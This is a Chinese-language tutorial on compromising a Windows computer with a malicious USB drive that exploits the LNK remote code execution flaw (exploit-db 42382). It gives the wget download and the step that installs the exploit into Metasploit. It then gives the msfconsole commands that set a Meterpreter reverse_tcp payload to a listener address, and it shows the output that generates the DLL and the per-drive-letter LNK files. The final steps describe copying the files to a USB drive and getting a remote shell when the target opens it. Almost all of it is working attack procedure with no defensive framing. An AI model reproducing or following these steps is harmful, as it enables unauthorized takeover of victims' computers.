通过U盘使用Link漏洞进行攻击

1. 下载漏洞脚本

从 exploit-db 下载 LNK Remote Code Execution Vulnerability 漏洞文件

wget https://www.exploit-db.com/download/42382.rb

2. 安装漏洞脚本

安装漏洞脚本很简单，只需要将下载的ruby漏洞脚本文件放到metasploit指定目录中即可

cp 42382.rb /usr/share/metasploit-framework/modules/exploits/windows/fileformat/

3. 启动监听并生成文件

msf > search 42382
msf exploit(42382) > use exploit/windows/fileformat/42382
msf exploit(42382) > set payload windows/x64/meterpreter/reverse_tcp # 注意目标是x86还是x64的
msf exploit(42382) > set lhost 192.168.1.15
msf exploit(42382) > show targets
msf exploit(42382) > set target 0
msf exploit(42382) > exploit

[*] /root/.msf4/local/lLbLLlpJEWOCVjXn.dll created copy it to the root folder of the target USB drive
[*] /root/.msf4/local/attUBiQoEENCHdXj_D.lnk create, copy to the USB drive if drive letter is D
[*] /root/.msf4/local/TPIhmhvfUkHRaotP_E.lnk create, copy to the USB drive if drive letter is E
[*] /root/.msf4/local/jlhbqmicbvEDUucR_F.lnk create, copy to the USB drive if drive letter is F
[*] /root/.msf4/local/KvvqRTlZixISpRHK_G.lnk create, copy to the USB drive if drive letter is G
[*] /root/.msf4/local/FDiknQGLVXPKFBIC_H.lnk create, copy to the USB drive if drive letter is H
[*] /root/.msf4/local/gHhqXTwmxeDPlpTA_I.lnk create, copy to the USB drive if drive letter is I
[*] /root/.msf4/local/njveXscZFvRwJLFJ_J.lnk create, copy to the USB drive if drive letter is J
[*] /root/.msf4/local/nZxhpuwJHVAIUNXx_K.lnk create, copy to the USB drive if drive letter is K
[*] /root/.msf4/local/QbOVySllSZXOmglY_L.lnk create, copy to the USB drive if drive letter is L
[*] /root/.msf4/local/qQhIaawNDiMbcaqK_M.lnk create, copy to the USB drive if drive letter is M
[*] /root/.msf4/local/fSylFhAGVNNwaYnd_N.lnk create, copy to the USB drive if drive letter is N
[*] /root/.msf4/local/PQyizrKnVNCRQJkd_O.lnk create, copy to the USB drive if drive letter is O
[*] /root/.msf4/local/xfhnyJCEsOdbpnhs_P.lnk create, copy to the USB drive if drive letter is P
[*] /root/.msf4/local/oSYDiEMnouNpHFqE_Q.lnk create, copy to the USB drive if drive letter is Q
[*] /root/.msf4/local/OBlpipdrGcLVdvhd_R.lnk create, copy to the USB drive if drive letter is R
[*] /root/.msf4/local/MFxDTvxGjYarzweM_S.lnk create, copy to the USB drive if drive letter is S
[*] /root/.msf4/local/LwmuNxBWnRfWevDC_T.lnk create, copy to the USB drive if drive letter is T
[*] /root/.msf4/local/wlJlNxRBICJVLnQX_U.lnk create, copy to the USB drive if drive letter is U
[*] /root/.msf4/local/rOHsCIBWNTrXGstq_V.lnk create, copy to the USB drive if drive letter is V
[*] /root/.msf4/local/BKUZRSPKBSukmlpy_W.lnk create, copy to the USB drive if drive letter is W
[*] /root/.msf4/local/hbOvINMLAxHcWavV_X.lnk create, copy to the USB drive if drive letter is X
[*] /root/.msf4/local/FTLzXgWfeTeMuieN_Y.lnk create, copy to the USB drive if drive letter is Y
[*] /root/.msf4/local/JKYOcCLPNuxnHvlh_Z.lnk create, copy to the USB drive if drive letter is Z

执行上述metasploit命令后会在本地启动好监听程序，并在~/.msf4/local中生成多个link文件

4. 制作渗透U盘

在目录 ~/.msf4/local 将生成的所有 Link 文件拷贝到U盘的根路径中

5. 触发漏洞得到Shell

将U盘插入目标windows机器中，打开U盘就会出发远程link漏洞，在Metasploit控制台中得到目标主机的shell